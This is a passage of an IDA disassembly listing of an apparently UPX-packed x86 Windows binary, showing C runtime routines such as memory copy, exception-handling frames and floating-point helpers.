off_41C5F0 dd offset loc_41C600 ; DATA XREF: sub_41C310+1B7�r
; sub_41C310:loc_41C4F4�r ...
dd offset loc_41C608
dd offset loc_41C618
dd offset loc_41C62C
; ---------------------------------------------------------------------------
loc_41C600: ; CODE XREF: sub_41C310+1B7�j
; sub_41C310:loc_41C4F4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41C608: ; CODE XREF: sub_41C310+1B7�j
; sub_41C310:loc_41C4F4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41C618: ; CODE XREF: sub_41C310+1B7�j
; sub_41C310:loc_41C4F4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41C62C: ; CODE XREF: sub_41C310+1B7�j
; sub_41C310:loc_41C4F4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41C310 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C645 proc near ; CODE XREF: sub_40BFEC+40�p
; UPX0:0040E2A0�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_41AFE0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_420510
add esp, 10h
leave
retn
sub_41C645 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C679(double)
sub_41C679 proc near ; CODE XREF: sub_40D031+38�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_43A970
call sub_4217E9
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_41C6FF
call sub_4216B1
pop ecx
test eax, eax
pop ecx
jle short loc_41C6E2
cmp eax, 2
jle short loc_41C6D4
cmp eax, 3
jnz short loc_41C6E2
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Bh ; double
call sub_420FC1
add esp, 10h
jmp short loc_41C744
; ---------------------------------------------------------------------------
loc_41C6D4: ; CODE XREF: sub_41C679+3F�j
push esi
push ebx
call sub_4217E9
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_41C744
; ---------------------------------------------------------------------------
loc_41C6E2: ; CODE XREF: sub_41C679+3A�j
; sub_41C679+44�j
fld [ebp+arg_0]
fadd dbl_427710
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_41C73C
; ---------------------------------------------------------------------------
loc_41C6FF: ; CODE XREF: sub_41C679+2F�j
call sub_421676
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_41C722
loc_41C714: ; CODE XREF: sub_41C679+AC�j
push esi
push ebx
call sub_4217E9
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_41C744
; ---------------------------------------------------------------------------
loc_41C722: ; CODE XREF: sub_41C679+99�j
test bl, 20h
jnz short loc_41C714
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_41C73C: ; CODE XREF: sub_41C679+84�j
call sub_421014
add esp, 1Ch
loc_41C744: ; CODE XREF: sub_41C679+59�j
; sub_41C679+67�j ...
pop esi
pop ebx
leave
retn
sub_41C679 endp
; =============== S U B R O U T I N E =======================================
sub_41C748 proc near ; CODE XREF: sub_41B784+9�p
; sub_4218B2+21�p
; DATA XREF: ...
call sub_41C760
call sub_4218B2
mov ds:dword_4DB9AC, eax
call sub_421862
fnclex
retn
sub_41C748 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41C760 proc near ; CODE XREF: sub_41C748�p
mov eax, offset sub_421CA0
mov off_43CF84, offset sub_421935
mov off_43CF80, eax
mov off_43CF88, offset sub_42199B
mov off_43CF8C, offset sub_4218DB
mov off_43CF90, offset sub_421983
mov off_43CF94, eax
retn
sub_41C760 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C798 proc near ; CODE XREF: sub_40D031+1B�p
; sub_40D031+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_41C798 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C7BF(double)
sub_41C7BF proc near ; CODE XREF: sub_40D07D+82�p
; sub_40D99C+3A1�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_43A988
call sub_4217E9
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_41C845
call sub_4216B1
pop ecx
test eax, eax
pop ecx
jle short loc_41C828
cmp eax, 2
jle short loc_41C81A
cmp eax, 3
jnz short loc_41C828
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Ch ; double
call sub_420FC1
add esp, 10h
jmp short loc_41C88A
; ---------------------------------------------------------------------------
loc_41C81A: ; CODE XREF: sub_41C7BF+3F�j
push esi
push ebx
call sub_4217E9
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_41C88A
; ---------------------------------------------------------------------------
loc_41C828: ; CODE XREF: sub_41C7BF+3A�j
; sub_41C7BF+44�j
fld [ebp+arg_0]
fadd dbl_427710
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_41C882
; ---------------------------------------------------------------------------
loc_41C845: ; CODE XREF: sub_41C7BF+2F�j
call sub_421676
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_41C868
loc_41C85A: ; CODE XREF: sub_41C7BF+AC�j
push esi
push ebx
call sub_4217E9
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_41C88A
; ---------------------------------------------------------------------------
loc_41C868: ; CODE XREF: sub_41C7BF+99�j
test bl, 20h
jnz short loc_41C85A
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_41C882: ; CODE XREF: sub_41C7BF+84�j
call sub_421014
add esp, 1Ch
loc_41C88A: ; CODE XREF: sub_41C7BF+59�j
; sub_41C7BF+67�j ...
pop esi
pop ebx
leave
retn
sub_41C7BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C88E proc near ; CODE XREF: sub_422111+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_41C88E endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_41C8C2 proc near ; CODE XREF: sub_4222C2+199�p
; sub_422486+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_41C8C2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C8C9 proc near ; CODE XREF: sub_4222C2+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_41C8C9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C8D0 proc near ; CODE XREF: sub_41CA82+5C�p
; sub_422111:loc_422142�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_41C8F8
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_42675C ; RtlUnwind
loc_41C8F8: ; DATA XREF: sub_41C8D0+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_41C8D0 endp
; ---------------------------------------------------------------------------
loc_41C91F: ; CODE XREF: UPX0:00426DFC�j
; UPX0:00426E19�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_421D16
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C955 proc near ; CODE XREF: sub_42218C+73�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_41C9A9
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_422510
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_41C955 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9A9 proc near ; DATA XREF: sub_41C955+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_421D16
add esp, 20h
pop ebp
retn
sub_41C9A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9CE proc near ; CODE XREF: sub_421F58+25�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_41CA82
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_41CA54
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_4DBA04
pop ecx
pop ecx
and [ebp+var_34], 0
loc_41CA54: ; DATA XREF: sub_41C9CE+3C�o
cmp [ebp+var_4], 0
jz short loc_41CA71
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_41CA7A
; ---------------------------------------------------------------------------
loc_41CA71: ; CODE XREF: sub_41C9CE+8A�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_41CA7A: ; CODE XREF: sub_41C9CE+A1�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_41C9CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA82 proc near ; DATA XREF: sub_41C9CE+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_41CAA5
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_41CAF2
; ---------------------------------------------------------------------------
loc_41CAA5: ; CODE XREF: sub_41CA82+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_421D16
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_41CAE3
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41C8D0
loc_41CAE3: ; CODE XREF: sub_41CA82+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_41CAF2: ; CODE XREF: sub_41CA82+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41CA82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAF7 proc near ; CODE XREF: sub_421DB1+C6�p
; sub_421F58+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_41CB4E
loc_41CB15: ; CODE XREF: sub_41CAF7+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_41CB1F
call sub_4225B2
loc_41CB1F: ; CODE XREF: sub_41CAF7+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_41CB34
cmp ecx, [eax+8]
jle short loc_41CB39
loc_41CB34: ; CODE XREF: sub_41CAF7+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_41CB45
loc_41CB39: ; CODE XREF: sub_41CAF7+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_41CB45: ; CODE XREF: sub_41CAF7+40�j
cmp [ebp+arg_4], 0
jge short loc_41CB15
mov eax, [ebp+var_4]
loc_41CB4E: ; CODE XREF: sub_41CAF7+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_41CB62
cmp esi, eax
jbe short loc_41CB67
loc_41CB62: ; CODE XREF: sub_41CAF7+65�j
call sub_4225B2
loc_41CB67: ; CODE XREF: sub_41CAF7+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_41CAF7 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB74 proc near ; CODE XREF: sub_4234B8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_41CB8C
push [ebp+arg_0]
call sub_42675C ; RtlUnwind
loc_41CB8C: ; DATA XREF: sub_41CB74+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41CB74 endp
; =============== S U B R O U T I N E =======================================
sub_41CB94 proc near ; DATA XREF: sub_41CBB6+A�o
; sub_41CC1E+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_41CBB5
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_41CBB5: ; CODE XREF: sub_41CB94+10�j
retn
sub_41CB94 endp
; =============== S U B R O U T I N E =======================================
sub_41CBB6 proc near ; CODE XREF: sub_422232+D�p
; sub_4234B8+67�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_41CB94
push large dword ptr fs:0
mov large fs:0, esp
loc_41CBD3: ; CODE XREF: sub_41CBB6:loc_41CC0E�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41CC10
cmp esi, [esp+1Ch+arg_4]
jz short loc_41CC10
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41CC0E
push 101h
mov eax, [ebx+esi*4+8]
call sub_41CC4A
call dword ptr [ebx+esi*4+8]
loc_41CC0E: ; CODE XREF: sub_41CBB6+44�j
jmp short loc_41CBD3
; ---------------------------------------------------------------------------
loc_41CC10: ; CODE XREF: sub_41CBB6+2A�j
; sub_41CBB6+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41CBB6 endp
; =============== S U B R O U T I N E =======================================
sub_41CC1E proc near ; CODE XREF: sub_422252+37�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_41CB94
jnz short locret_41CC40
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_41CC40
mov eax, 1
locret_41CC40: ; CODE XREF: sub_41CC1E+10�j
; sub_41CC1E+1B�j
retn
sub_41CC1E endp
; =============== S U B R O U T I N E =======================================
sub_41CC41 proc near ; CODE XREF: sub_422510+1E�p
; sub_422510+40�p
push ebx
push ecx
mov ebx, offset dword_43A98C
jmp short loc_41CC54
sub_41CC41 endp
; =============== S U B R O U T I N E =======================================
sub_41CC4A proc near ; CODE XREF: sub_41CBB6+4F�p
; sub_4234B8+78�p
push ebx
push ecx
mov ebx, offset dword_43A98C
mov ecx, [ebp+8]
loc_41CC54: ; CODE XREF: sub_41CC41+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_41CC4A endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_41CC64 proc near ; CODE XREF: sub_40D07D+5�p
; sub_40D21F+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_41CC64 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41CC83 proc near ; CODE XREF: sub_40D6B4+26�p
; UPX0:004264F2�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41B0B1
pop ecx
retn
sub_41CC83 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC90 proc near ; CODE XREF: sub_40D725+3A�p
; sub_41DEA2+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41CCB0
cmp edi, eax
jb loc_41CE28
loc_41CCB0: ; CODE XREF: sub_41CC90+16�j
test edi, 3
jnz short loc_41CCCC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41CCEC
rep movsd
jmp off_41CDD8[edx*4]
; ---------------------------------------------------------------------------
loc_41CCCC: ; CODE XREF: sub_41CC90+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41CCE4
and eax, 3
add ecx, eax
jmp dword ptr loc_41CCEC+4[eax*4]
; ---------------------------------------------------------------------------
loc_41CCE4: ; CODE XREF: sub_41CC90+46�j
jmp dword ptr loc_41CDE8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41CCEC: ; CODE XREF: sub_41CC90+31�j
; sub_41CC90+8E�j ...
jmp off_41CD6C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_41CD00
dd offset loc_41CD2C
dd offset loc_41CD50
; ---------------------------------------------------------------------------
loc_41CD00: ; DATA XREF: sub_41CC90+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41CCEC
rep movsd
jmp off_41CDD8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41CD2C: ; DATA XREF: sub_41CC90+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41CCEC
rep movsd
jmp off_41CDD8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41CD50: ; DATA XREF: sub_41CC90+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41CCEC
rep movsd
jmp off_41CDD8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41CD6C dd offset loc_41CDCF ; DATA XREF: sub_41CC90:loc_41CCEC�r
dd offset loc_41CDBC
dd offset loc_41CDB4
dd offset loc_41CDAC
dd offset loc_41CDA4
dd offset loc_41CD9C
dd offset loc_41CD94
dd offset loc_41CD8C
; ---------------------------------------------------------------------------
loc_41CD8C: ; CODE XREF: sub_41CC90:loc_41CCEC�j
; DATA XREF: sub_41CC90+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41CD94: ; CODE XREF: sub_41CC90:loc_41CCEC�j
; DATA XREF: sub_41CC90+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41CD9C: ; CODE XREF: sub_41CC90:loc_41CCEC�j
; DATA XREF: sub_41CC90+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41CDA4: ; CODE XREF: sub_41CC90:loc_41CCEC�j
; DATA XREF: sub_41CC90+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41CDAC: ; CODE XREF: sub_41CC90:loc_41CCEC�j
; DATA XREF: sub_41CC90+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41CDB4: ; CODE XREF: sub_41CC90:loc_41CCEC�j
; DATA XREF: sub_41CC90+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41CDBC: ; CODE XREF: sub_41CC90:loc_41CCEC�j
; DATA XREF: sub_41CC90+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41CDCF: ; CODE XREF: sub_41CC90:loc_41CCEC�j
; DATA XREF: sub_41CC90:off_41CD6C�o
jmp off_41CDD8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41CDD8 dd offset loc_41CDE8 ; DATA XREF: sub_41CC90+35�r
; sub_41CC90+92�r ...
dd offset loc_41CDF0
dd offset loc_41CDFC
dd offset loc_41CE10
; ---------------------------------------------------------------------------
loc_41CDE8: ; CODE XREF: sub_41CC90+35�j
; sub_41CC90+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41CDF0: ; CODE XREF: sub_41CC90+35�j
; sub_41CC90+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41CDFC: ; CODE XREF: sub_41CC90+35�j
; sub_41CC90+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41CE10: ; CODE XREF: sub_41CC90+35�j
; sub_41CC90+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41CE28: ; CODE XREF: sub_41CC90+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41CE5C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41CE50
std
rep movsd
cld
jmp off_41CF70[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41CE50: ; CODE XREF: sub_41CC90+1B1�j
; sub_41CC90+208�j ...
neg ecx
jmp off_41CF20[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41CE5C: ; CODE XREF: sub_41CC90+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41CE74
and eax, 3
sub ecx, eax
jmp dword ptr loc_41CE74+4[eax*4]
; ---------------------------------------------------------------------------
loc_41CE74: ; CODE XREF: sub_41CC90+1D6�j
; DATA XREF: sub_41CC90+1DD�r
jmp off_41CF70[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41CE87+1
dd offset loc_41CEA8
; ---------------------------------------------------------------------------
ror dh, 1
inc ecx
loc_41CE87: ; DATA XREF: sub_41CC90+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_41CE50
std
rep movsd
cld
jmp off_41CF70[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41CEA8: ; DATA XREF: sub_41CC90+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41CE50
std
rep movsd
cld
jmp off_41CF70[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41CE50
std
rep movsd
cld
jmp off_41CF70[edx*4]
